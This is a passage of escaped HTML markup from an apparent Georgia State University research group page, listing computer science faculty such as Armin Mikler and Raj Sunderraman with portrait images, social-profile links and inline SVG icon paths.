href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c433-outer\">\n <div data-colibri-id=\"182-c433\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c433 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c434\" class=\"d-block style-978 style-local-182-c434 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg\" class=\"wp-image-1409 style-978-image style-local-182-c434-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c434-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c435\" class=\"h-global-transition-all h-heading style-974 style-local-182-c435 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c435\">\n <!---->\n <!---->\n <h4 class=\"\">Armin Mikler</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c436\" class=\"h-text h-text-component style-975 style-local-182-c436 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p> Chair and Professor\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c437\" class=\"h-text h-text-component style-976 style-local-182-c437 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c438\" class=\"style-979 style-local-182-c438 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c439-outer\">\n <div data-colibri-id=\"182-c439\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c439 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c440\" class=\"d-block style-980 style-local-182-c440 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c440-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c440-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c441\" class=\"h-global-transition-all h-heading style-974 style-local-182-c441 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-974 style-local-182-c441\">\n <!---->\n <!---->\n <h4 class=\"\">Raj Sunderraman</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c442\" class=\"h-text h-text-component style-975 style-local-182-c442 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Associate Chair and Professor</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c443\" class=\"h-text h-text-component style-976 style-local-182-c443 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c444\" class=\"style-981 style-local-182-c444 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?hl=en&user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 